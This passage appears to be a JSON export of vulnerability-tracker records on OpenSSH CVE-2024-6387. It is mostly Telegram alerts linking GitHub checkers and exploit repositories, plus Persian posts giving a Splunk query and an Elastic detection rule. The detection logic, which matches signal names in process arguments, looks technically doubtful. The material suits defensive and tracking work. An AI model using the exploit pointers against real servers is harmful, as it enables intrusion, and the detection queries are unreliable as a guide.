"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aOpenSSH CVE-2024-6387 Vulnerability Checker\nURL\uff1ahttps://github.com/betancour/OpenSSH-Vulnerability-test\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T01:28:32.000000Z"}, {"uuid": "06cff0e1-7345-442d-8eb0-b73634033893", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7818", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRCE OpenSSH CVE-2024-6387 Check\nURL\uff1ahttps://github.com/HadesNull123/CVE-2024-6387-Check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T05:23:43.000000Z"}, {"uuid": "f1ea52a0-a125-439c-af5d-bdea4124ea77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7817", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387 exploit\nURL\uff1ahttps://github.com/thegenetic/CVE-2024-6387-exploit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T04:12:17.000000Z"}, {"uuid": "70c887ce-a1d8-4a50-bda4-8b0a3c7b2875", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7983", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a OpenSSH a publi\u00e9 un avis de s\u00e9curit\u00e9 concernant la vuln\u00e9rabilit\u00e9 critique CVE-2024-6387. Cette vuln\u00e9rabilit\u00e9 permet \u00e0 un attaquant non authentifi\u00e9 d'ex\u00e9cuter du  code arbitraire\nURL\uff1ahttps://github.com/Jhonsonwannaa/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-14T18:06:27.000000Z"}, {"uuid": "38ef9ad9-967c-416e-86c2-53ab45b4ff36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7912", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aChef Inspec profile for checking regreSSHion vulnerability CVE-2024-6387\nURL\uff1ahttps://github.com/vkaushik-chef/regreSSHion\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-08T11:59:01.000000Z"}, {"uuid": "16226dd5-83e6-47c1-b5e6-32e6fa7de7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/77950", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #\u6f0f\u6d1e #\u68c0\u6d4b #\u5206\u6790\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2024-6387-analysis\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Doux-x\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-03-30 09:59:03\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2024-6387 OpenSSH \u4fe1\u53f7\u7ade\u4e89\u6f0f\u6d1e\uff08regreSSHion\uff09\u5206\u6790\u62a5\u544a\u53ca\u68c0\u6d4b\u811a\u672c\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-03-30T10:00:19.000000Z"}, {"uuid": "c0d2124b-5587-4d94-a02e-e993542f8add", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/dfirclub/82", "content": "\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc CVE-2024-6387 \u062f\u0631 OpenSSH \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Splunk\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u06cc\u06a9 \u06a9\u0648\u0626\u0631\u06cc \u062c\u0633\u062a\u062c\u0648\u06cc \u067e\u06cc\u0634\u0631\u0641\u062a\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u062e\u0627\u0635\u06cc \u062f\u0631 \u0644\u0627\u06af\u200c\u0647\u0627 \u0628\u06af\u0631\u062f\u062f \u06a9\u0647 \u0646\u0634\u0627\u0646\u200c\u062f\u0647\u0646\u062f\u0647 \u062a\u0644\u0627\u0634\u200c\u0647\u0627\u06cc \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0628\u0627\u0634\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0648\u0626\u0631\u06cc \u0628\u0647 \u062e\u0635\u0648\u0635 \u0628\u0627\u06cc\u062f \u0628\u0647 \u0633\u06cc\u06af\u0646\u0627\u0644\u200c\u0647\u0627\u06cc \u063a\u06cc\u0631\u0639\u0627\u062f\u06cc\u060c \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 sshd`\u060c \u0648 \u0633\u06cc\u06af\u0646\u0627\u0644\u200c\u0647\u0627\u06cc `SIGALRM \u0648 syslog \u062a\u0648\u062c\u0647 \u06a9\u0646\u062f.\n\n\u062f\u0631 \u0627\u062f\u0627\u0645\u0647 \u06cc\u06a9 \u06a9\u0648\u0626\u0631\u06cc Splunk \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u06cc\u0646 \u0646\u0648\u0639 \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627 \u0622\u0645\u062f\u0647 \u0627\u0633\u062a:\n\nindex=your_index sourcetype=your_sourcetype process.name=sshd \n| eval suspicious_signal=if(match(process.args, \"SIGALRM\") AND match(process.args, \"syslog\"), 1, 0)\n| where suspicious_signal=1\n| stats count by host, process.name, process.args, _time\n| rename _time as \"Time\", host as \"Host\", process.name as \"Process Name\", process.args as \"Process Arguments\", count as \"Count\"\n| table Time, Host, \"Process Name\", \"Process Arguments\", Count\n| sort - Count\n\n\u062a\u0648\u0636\u06cc\u062d \u06a9\u0648\u0626\u0631\u06cc\n\n1. index=your_index sourcetype=your_sourcetype process.name=sshd:\n   - \u062c\u0633\u062a\u062c\u0648 \u062f\u0631 \u0627\u06cc\u0646\u062f\u06a9\u0633 \u0648 \u0633\u0648\u0631\u0633\u200c\u062a\u0627\u06cc\u067e \u0645\u0646\u0627\u0633\u0628 \u0628\u0631\u0627\u06cc \u0641\u0631\u0622\u06cc\u0646\u062f sshd.\n   - \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 your_index \u0648 your_sourcetype \u0628\u0627 \u0627\u06cc\u0646\u062f\u06a9\u0633 \u0648 \u0633\u0648\u0631\u0633\u200c\u062a\u0627\u06cc\u067e\u200c\u0647\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0645\u062d\u06cc\u0637 \u062e\u0648\u062f\u062a\u0627\u0646.\n\n2. eval suspicious_signal=if(match(process.args, \"SIGALRM\") AND match(process.args, \"syslog\"), 1, 0):\n   - \u0627\u0631\u0632\u06cc\u0627\u0628\u06cc \u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u0641\u0631\u0622\u06cc\u0646\u062f \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u062d\u0636\u0648\u0631 \u0633\u06cc\u06af\u0646\u0627\u0644 SIGALRM \u0648 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc syslog.\n   - \u0627\u06af\u0631 \u0647\u0631 \u062f\u0648 \u0645\u0639\u06cc\u0627\u0631 \u0645\u0637\u0627\u0628\u0642\u062a \u062f\u0627\u0634\u062a\u0646\u062f\u060c suspicious_signal \u0631\u0627 \u0628\u0647 1 \u062a\u0646\u0638\u06cc\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f.\n\n3. where suspicious_signal=1:\n   - \u0641\u06cc\u0644\u062a\u0631 \u06a9\u0631\u062f\u0646 \u0646\u062a\u0627\u06cc\u062c \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0641\u0642\u0637 \u0622\u0646\u0647\u0627\u06cc\u06cc \u06a9\u0647 suspicious_signal \u0628\u0631\u0627\u0628\u0631 \u0628\u0627 1 \u0627\u0633\u062a\u060c \u06cc\u0639\u0646\u06cc \u0622\u0646\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0647\u0631 \u062f\u0648 \u0645\u0639\u06cc\u0627\u0631 \u0633\u06cc\u06af\u0646\u0627\u0644 \u0648 syslog \u0631\u0627 \u062f\u0627\u0631\u0646\u062f.\n\n4. stats count by host, process.name, process.args, _time:\n   - \u0622\u0645\u0627\u0631\u06af\u06cc\u0631\u06cc \u0627\u0632 \u062a\u0639\u062f\u0627\u062f \u0648\u0642\u0648\u0639\u200c\u0647\u0627 \u0628\u0631 \u0627\u0633\u0627\u0633 \u0645\u06cc\u0632\u0628\u0627\u0646\u060c \u0646\u0627\u0645 \u0641\u0631\u0622\u06cc\u0646\u062f\u060c \u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u0641\u0631\u0622\u06cc\u0646\u062f \u0648 \u0632\u0645\u0627\u0646.\n\n5. rename _time as \"Time\", host as \"Host\", process.name as \"Process Name\", process.args as \"Process Arguments\", count as \"Count\":\n   - \u062a\u063a\u06cc\u06cc\u0631 \u0646\u0627\u0645 \u0641\u06cc\u0644\u062f\u0647\u0627 \u0628\u0631\u0627\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0628\u0647\u062a\u0631 \u062f\u0631 \u062c\u062f\u0648\u0644 \u0646\u0647\u0627\u06cc\u06cc.\n\n6. table Time, Host, \"Process Name\", \"Process Arguments\", Count:\n   - \u0646\u0645\u0627\u06cc\u0634 \u0646\u062a\u0627\u06cc\u062c \u062f\u0631 \u0642\u0627\u0644\u0628 \u062c\u062f\u0648\u0644 \u0634\u0627\u0645\u0644 \u0632\u0645\u0627\u0646\u060c \u0645\u06cc\u0632\u0628\u0627\u0646\u060c \u0646\u0627\u0645 \u0641\u0631\u0622\u06cc\u0646\u062f\u060c \u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u0641\u0631\u0622\u06cc\u0646\u062f \u0648 \u062a\u0639\u062f\u0627\u062f.\n\n7. sort - Count:\n   - \u0645\u0631\u062a\u0628\u200c\u0633\u0627\u0632\u06cc \u0646\u062a\u0627\u06cc\u062c \u0628\u0631 \u0627\u0633\u0627\u0633 \u062a\u0639\u062f\u0627\u062f \u0648\u0642\u0648\u0639\u200c\u0647\u0627 \u0628\u0647 \u0635\u0648\u0631\u062a \u0646\u0632\u0648\u0644\u06cc.\n\n\u0627\u06cc\u0646 \u06a9\u0648\u0626\u0631\u06cc \u0628\u0647 \u0634\u0645\u0627 \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u062f \u062a\u0627 \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u0645\u0634\u06a9\u0648\u06a9 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc CVE-2024-6387 \u062f\u0631 OpenSSH \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0646\u06cc\u062f. \u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0648\u0626\u0631\u06cc \u062f\u0631 Splunk\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0644\u0627\u06af\u200c\u0647\u0627\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 sshd \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u062f \u0648 \u062a\u0644\u0627\u0634\u200c\u0647\u0627\u06cc \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0631\u0627 \u0628\u0647 \u0633\u0631\u0639\u062a \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0646\u06cc\u062f.", "creation_timestamp": "2024-07-10T04:25:42.000000Z"}, {"uuid": "f7155867-05ff-40d1-88a6-fcb4990ac250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/p_EvDlFgEJuiOJi0pdpDLW7XAzWWPVWvDgc6lfDEOZmEhu0", "content": "", "creation_timestamp": "2026-03-30T15:00:06.000000Z"}, {"uuid": "acd5c155-61a4-462a-a0ce-d0c5082bde55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7822", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aUsed to detect ssh servers vulnerable to CVE-2024-6387. Shameless robbery from https://github.com/bigb0x/CVE-2024-6387 using ChatGPT to translate the code to PHP.\nURL\uff1ahttps://github.com/CiderAndWhisky/regression-scanner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T07:44:48.000000Z"}, {"uuid": "134bb2a6-2aa7-4952-a022-7eb291ccef06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7821", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387-nmap\nURL\uff1ahttps://github.com/paradessia/CVE-2024-6387-nmap\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T07:16:03.000000Z"}, {"uuid": "22c572a6-8019-4c35-9f0c-f7740af2f591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7819", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aRCE OpenSSH CVE-2024-6387 Check\nURL\uff1ahttps://github.com/HadesNull123/CVE-2024-6387_Check\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-07-02T05:27:51.000000Z"}, {"uuid": "bfd8f3ef-dc0d-41a4-afec-8ed9e624dff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7824", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aScript for checking CVE-2024-6387 vulnerability\nURL\uff1ahttps://github.com/shamo0/CVE-2024-6387_PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T08:18:48.000000Z"}, {"uuid": "63a37867-d4c0-4fd1-a192-da3b4edd03b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7823", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aUsed to detect ssh servers vulnerable to CVE-2024-6387. Shameless robbery from https://github.com/bigb0x/CVE-2024-6387 using ChatGPT to translate the code to PHP.\nURL\uff1ahttps://github.com/R4Tw1z/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T07:53:02.000000Z"}, {"uuid": "aba3dd83-c904-441f-b852-2d725372a3bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/dfirclub/84", "content": "\u0642\u0627\u0646\u0648\u0646 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc CVE-2024-6387 \u062f\u0631 Elastic Security\n\n\u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0641\u0627\u06cc\u0644 \u067e\u06cc\u0648\u0633\u062a \u0634\u062f\u0647\u060c \u06a9\u0647 \u062d\u0627\u0648\u06cc \u062c\u0632\u0626\u06cc\u0627\u062a \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc CVE-2024-6387 \u062f\u0631 OpenSSH \u0627\u0633\u062a\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06cc\u06a9 \u0642\u0627\u0646\u0648\u0646 \u062a\u0634\u062e\u06cc\u0635\u06cc \u0628\u0631\u0627\u06cc Elastic Security \u0628\u0646\u0648\u06cc\u0633\u06cc\u0645. \u0627\u06cc\u0646 \u0642\u0627\u0646\u0648\u0646 \u062a\u0644\u0627\u0634\u200c\u0647\u0627\u06cc \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0633\u06cc\u06af\u0646\u0627\u0644 \u0647\u0646\u062f\u0644 \u062f\u0631 OpenSSH \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.\n\n \u0642\u0627\u0646\u0648\u0646 Elastic Security\n\n\u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u06cc\u06a9 \u0642\u0627\u0646\u0648\u0646 Elastic Security \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0622\u0648\u0631\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a:\n\n{\n  \"rule_id\": \"cve-2024-6387-detection\",\n  \"description\": \"\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u062a\u0644\u0627\u0634\u200c\u0647\u0627\u06cc \u0628\u0627\u0644\u0642\u0648\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 CVE-2024-6387 \u062f\u0631 OpenSSH \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u063a\u06cc\u0631\u0645\u0639\u0645\u0648\u0644 \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 SIGALRM.\",\n  \"risk_score\": 85,\n  \"severity\": \"high\",\n  \"interval\": \"5m\",\n  \"name\": \"\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 CVE-2024-6387 \u062f\u0631 OpenSSH\",\n  \"type\": \"query\",\n  \"query\": \"\"\"\n  event.category:process and event.action:signal and process.name:sshd and process.args:*SIGALRM* and process.args:*syslog*\n  \"\"\",\n  \"language\": \"kuery\",\n  \"filters\": [],\n  \"index\": [\n    \"logs-*\",\n    \"filebeat-*\"\n  ],\n  \"threat\": {\n    \"framework\": \"MITRE ATT&CK\",\n    \"tactic\": {\n      \"id\": \"TA0002\",\n      \"name\": \"Execution\"\n    },\n    \"technique\": [\n      {\n        \"id\": \"T1203\",\n        \"name\": \"Exploitation for Client Execution\",\n        \"reference\": \"https://attack.mitre.org/techniques/T1203/\"\n      }\n    ]\n  },\n  \"actions\": [\n    {\n      \"group\": \"default\",\n      \"id\": \"email\",\n      \"params\": {\n        \"to\": [\n          \"security-team@example.com\"\n        ],\n        \"subject\": \"\u0647\u0634\u062f\u0627\u0631: \u062a\u0644\u0627\u0634 \u0628\u0627\u0644\u0642\u0648\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 CVE-2024-6387 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\",\n        \"message\": \"\u062a\u0644\u0627\u0634\u06cc \u0628\u0631\u0627\u06cc \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 CVE-2024-6387 \u062f\u0631 OpenSSH \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a. \u0644\u0637\u0641\u0627\u064b \u0633\u06cc\u0633\u062a\u0645 \u0622\u0633\u06cc\u0628\u200c\u062f\u06cc\u062f\u0647 \u0631\u0627 \u0641\u0648\u0631\u0627\u064b \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u062f.\"\n      }\n    },\n    {\n      \"group\": \"default\",\n      \"id\": \"webhook\",\n      \"params\": {\n        \"url\": \"https://your-response-endpoint.com\",\n        \"method\": \"post\",\n        \"headers\": {\n          \"Content-Type\": \"application/json\"\n        },\n        \"body\": \"{\\\"alert\\\": \\\"\u062a\u0644\u0627\u0634 \u0628\u0627\u0644\u0642\u0648\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 CVE-2024-6387 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f. \u0644\u0637\u0641\u0627\u064b \u0633\u06cc\u0633\u062a\u0645 \u0622\u0633\u06cc\u0628\u200c\u062f\u06cc\u062f\u0647 \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u062f.\\\"}\"\n      }\n    }\n  ]\n}\n\n\u062a\u0648\u0636\u06cc\u062d \u0642\u0627\u0646\u0648\u0646\n\n1. \u0645\u0639\u06cc\u0627\u0631\u0647\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc:\n   - event.category:process: \u0641\u06cc\u0644\u062a\u0631 \u06a9\u0631\u062f\u0646 \u0644\u0627\u06af\u200c\u0647\u0627 \u0628\u0647 \u0631\u0648\u06cc\u062f\u0627\u062f\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0641\u0631\u0622\u06cc\u0646\u062f.\n   - event.action:signal: \u062a\u0645\u0631\u06a9\u0632 \u0628\u0631 \u0631\u0648\u06cc \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0633\u06cc\u06af\u0646\u0627\u0644\u200c\u062f\u0647\u06cc\u060c \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u0631\u0627\u06cc\u0637 \u0645\u0633\u0627\u0628\u0642\u0647 \u062d\u06cc\u0627\u062a\u06cc \u0647\u0633\u062a\u0646\u062f.\n   - process.name:sshd: \u0645\u062d\u062f\u0648\u062f \u06a9\u0631\u062f\u0646 \u062f\u0627\u0645\u0646\u0647 \u0628\u0647 \u0641\u0631\u0622\u06cc\u0646\u062f `sshd`\u060c \u0632\u06cc\u0631\u0627 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631 \u0633\u0631\u0648\u0631 OpenSSH \u062a\u0623\u062b\u06cc\u0631 \u0645\u06cc\u200c\u06af\u0630\u0627\u0631\u062f.\n   - process.args:*SIGALRM***: \u062c\u0633\u062a\u062c\u0648 \u0628\u0631\u0627\u06cc \u0633\u06cc\u06af\u0646\u0627\u0644 SIGALRM\u060c \u06a9\u0647 \u062f\u0631 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u0631\u06a9\u0632\u06cc \u0627\u0633\u062a.\n   - **process.args:*syslog***: \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc\u200c\u0647\u0627\u06cc syslog \u062f\u0631 \u062f\u0627\u062e\u0644 \u0633\u06cc\u06af\u0646\u0627\u0644 \u0647\u0646\u062f\u0644\u0631\u060c \u0646\u0634\u0627\u0646\u200c\u062f\u0647\u0646\u062f\u0647 \u0634\u0631\u0627\u06cc\u0637 \u0645\u0633\u0627\u0628\u0642\u0647.\n\n2. **\u0646\u0642\u0634\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062a\u0647\u062f\u06cc\u062f:\n   - \u0642\u0627\u0646\u0648\u0646 \u0628\u0647 \u0686\u0627\u0631\u0686\u0648\u0628 MITRE ATT&CK \u0628\u0627 \u062a\u0627\u06a9\u062a\u06cc\u06a9 \u0627\u062c\u0631\u0627\u06cc \u0648 \u062a\u06a9\u0646\u06cc\u06a9 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u0644\u0627\u06cc\u0646\u062a**\u060c \u0628\u0631\u062c\u0633\u062a\u0647 \u06a9\u0631\u062f\u0646 \u0645\u0627\u0647\u06cc\u062a \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u060c \u0646\u06af\u0627\u0634\u062a \u0634\u062f\u0647 \u0627\u0633\u062a.\n\n3. **\u0627\u0642\u062f\u0627\u0645\u0627\u062a \u067e\u0627\u0633\u062e:\n   - \u0627\u0642\u062f\u0627\u0645 \u0627\u06cc\u0645\u06cc\u0644: \u06cc\u06a9 \u0647\u0634\u062f\u0627\u0631 \u0627\u06cc\u0645\u06cc\u0644 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a \u062a\u0627 \u062a\u06cc\u0645 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0631\u0627 \u0628\u0644\u0627\u0641\u0627\u0635\u0644\u0647 \u067e\u0633 \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u062a\u0644\u0627\u0634 \u0628\u0627\u0644\u0642\u0648\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0645\u0637\u0644\u0639 \u06a9\u0646\u062f.\n   - \u0627\u0642\u062f\u0627\u0645 webhook: \u06cc\u06a9 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0648\u0628 \u0628\u0647 \u06cc\u06a9 \u0646\u0642\u0637\u0647 